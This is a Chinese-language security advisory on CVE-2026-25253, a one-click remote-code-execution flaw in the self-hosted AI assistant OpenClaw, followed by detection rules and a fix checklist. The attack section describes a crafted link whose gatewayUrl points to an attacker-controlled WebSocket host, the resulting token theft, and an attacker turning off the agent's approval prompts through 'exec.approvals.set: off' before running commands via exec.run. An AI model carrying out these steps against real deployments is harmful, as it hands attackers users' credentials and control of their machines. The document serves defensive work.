2026 年 2 月,开源 AI 助手 OpenClaw 曝出严重安全漏洞 CVE-2026-25253,允许攻击者通过单次鼠标点击实现远程代码执行(RCE)。截至公开披露时,全球超过四万 OpenClaw 实例暴露在互联网,其中约一万两千台确认可被远程 exploit。本文深入剖析该漏洞的攻击链路、代码注入点,并输出可落地的检测规则与修复清单,帮助运维人员快速止血。
漏洞概述与影响范围
OpenClaw 是一款自托管 AI 助手,可代替用户执行读取消息、管理邮件、浏览网页、运行终端命令等操作。由于功能定位,它通常持有极高权限(俗称 “god mode”),这使其成为攻击者的理想目标。CVE-2026-25253 的核心问题在于 OpenClaw Control UI 盲目信任浏览器 URL 中的 gatewayUrl 参数,并在用户无感知的情况下自动向该地址发起 WebSocket 连接,同时携带用户当前的认证令牌。
漏洞披露后的扫描数据显示,全球公开暴露的 OpenClaw 实例约为四万台,百分之六十三评估为可被远程利用。这些实例大多运行在默认端口 18789,且缺乏认证保护,导致攻击者可直连内网目标。值得注意的是,即使 OpenClaw 仅绑定 localhost,攻击仍可通过受害者的浏览器中转完成,真正突破了 “本地运行即安全” 的常见假设。
攻击向量与代码注入点深度剖析
第一步:诱导点击与参数注入
攻击者构造恶意链接,例如 https:// victim-openclaw-ui/#/home?gatewayUrl=attacker-controlled.ws,当受害者点击并在浏览器中打开 OpenClaw Control UI 时,UI 会提取 URL 中的 gatewayUrl 参数而未做安全校验,随即发起 WebSocket 连接。这一步实现的关键在于 OpenClaw 前端缺乏对来源域名的白名单校验,任何跨域站点均可触发该行为。
第二步:令牌泄露与认证绕过
受害者浏览器向攻击者控制的 WebSocket 服务器发起连接请求时,会自动携带当前域的 Cookie 与本地存储的认证令牌。攻击者截获该令牌后,即可在自己的机器上打开与受害者 OpenClaw 实例的直接连接。由于 WebSocket 不受同源策略约束,攻击者的请求可直达本应受防火墙保护的 localhost 服务。
第三步:关闭审批与沙箱突破
获得管理员级别的 API 访问权限后,攻击者发送关键配置变更请求 exec.approvals.set: off,彻底禁用用户确认提示。随后通过 exec.run 接口执行任意系统命令,实现完整的远程代码执行。整个攻击链在毫秒级完成,受害者往往只在浏览器标签页中停留数秒便已沦陷。
此攻击链的核心代码注入点位于前端 UI 对 gatewayUrl 参数的无条件信任,以及后端 API 缺乏对 WebSocket 来源的验证与审批流程的强制开启。
防御检测规则与监控要点
针对上述攻击阶段,安全团队可部署以下检测与防护规则,形成从网络层到应用层的多纵深防御体系。
网络层检测规则
在网络边界设备或 IDS/IPS 上部署以下规则:检测目的端口为 18789 且来源 IP 非本机的 WebSocket 连接请求,若同一源 IP 在一分钟内发起超过五次连接尝试,则触发告警;监控外向流量中是否存在发往非白名单域名的 WebSocket 请求,特别是包含 token 参数的 GET 请求;针对已泄露令牌的异常使用行为,设置频率阈值:同一令牌在五分钟内从超过两个不同 IP 地址发起 API 调用时自动阻断。
主机层检测规则
在运行 OpenClaw 的主机上部署进程与文件系统监控:监控 OpenClaw 进程是否出现非预期子进程创建,特别是 /bin/sh、cmd.exe、powershell.exe 等命令解释器的直接调用;审计 /var/log/openclaw/ 或 Windows 对应日志目录中的配置变更事件,重点关注 exec.approvals.set、config.modify 等敏感操作;使用内核级审计追踪 /etc/openclaw/config.json 以及应用配置目录的写权限变更,任何非运维时段的修改均应告警。
应用层检测规则
在 OpenClaw 自身日志中埋点检测:记录 WebSocket 连接的来源域名与 Referer 头,若 Referer 域名不在内部域名白名单且非直接访问,则标记为潜在跨站请求;对 exec.approvals 配置变更进行强制日志记录,并在检测到状态从 on 切换为 off 时立即发送安全告警;审计用户会话令牌的有效期与使用场景,同一令牌在短时间内的跨地域使用应触发风控拦截。
监控仪表盘关键指标
运维团队应持续关注以下核心指标:WebSocket 连接源 IP 分布(异常外部 IP 占比应为零);审批开关状态变化频率(正常运维场景下每日变更次数应低于五次);API 调用中 exec.run 的请求量与响应码分布,若出现大量成功响应且伴随高频率的系统命令调用,则可能存在 RCE 攻击;暴露端口 18789 的互联网资产数量,应通过定期扫描保持为零。
修复方案与安全配置清单
紧急修复步骤
第一,立即升级至版本 2026.1.29 或更高版本,该版本已默认关闭自动连接外部 gatewayUrl 的行为并在后端强制校验 WebSocket 来源域名。第二,所有在漏洞披露前运行过受影响版本的用户,必须立即轮换 OpenClaw 的认证令牌以及与之关联的第三方服务 API 密钥。第三,全面审计 ClawHub 插件市场已安装的技能列表,移除来源不明或未通过代码审查的插件,目前安全社区已识别超过八百个恶意技能。
中长期加固措施
启用 OpenClaw 实例的强认证机制,禁止无密码或默认凭证运行;对 WebSocket 接口实施来源域名白名单策略,仅允许受信任的内部域名发起连接;在网络层将端口 18789 列入防火墙入站规则的黑名单,除本机 127.0.0.1 外拒绝一切外部访问;实施最小权限原则,限制 OpenClaw 进程的系统命令执行能力,避免给予完全的 shell 访问权限;建立配置变更审批流程,所有对 exec.approvals、gatewayUrl、apiKeys 等敏感配置的修改必须经过双人复核。
运营监控建议
建议部署安全信息与事件管理(SIEM)系统,采集 OpenClaw 进程日志、网络流量日志与系统审计日志,通过关联分析实现对异常行为的自动检测;制定专项应急预案,明确在发现 RCE 攻击迹象时的隔离、取证与恢复流程;定期开展红蓝对抗演练,模拟攻击者通过钓鱼链接触发漏洞的全链路场景,验证检测规则的有效性与响应时效。
总结
CVE-2026-25253 漏洞的危险性在于它同时利用了前端对用户输入的盲目信任、后端缺乏来源校验的设计缺陷,以及浏览器 WebSocket 不受同源策略限制的底层特性,形成一条可在毫秒级完成从令箭到代码执行的攻击链。面对此类结合身份凭证泄露与本地服务绕过的复合型漏洞,单纯依赖网络隔离或本地运行已不足以提供有效防御。组织应当从自动连接行为的代码层面根除信任来源、强制 WebSocket 双向认证与来源校验、保持审批开关默认开启并禁止关闭、以及建立覆盖网络主机应用三层的检测与响应体系,方能在实战中有效拦截或快速发现此类攻击。
资料来源:ProArch 安全分析报告《OpenClaw One-Click RCE Vulnerability (CVE-2026-25253)》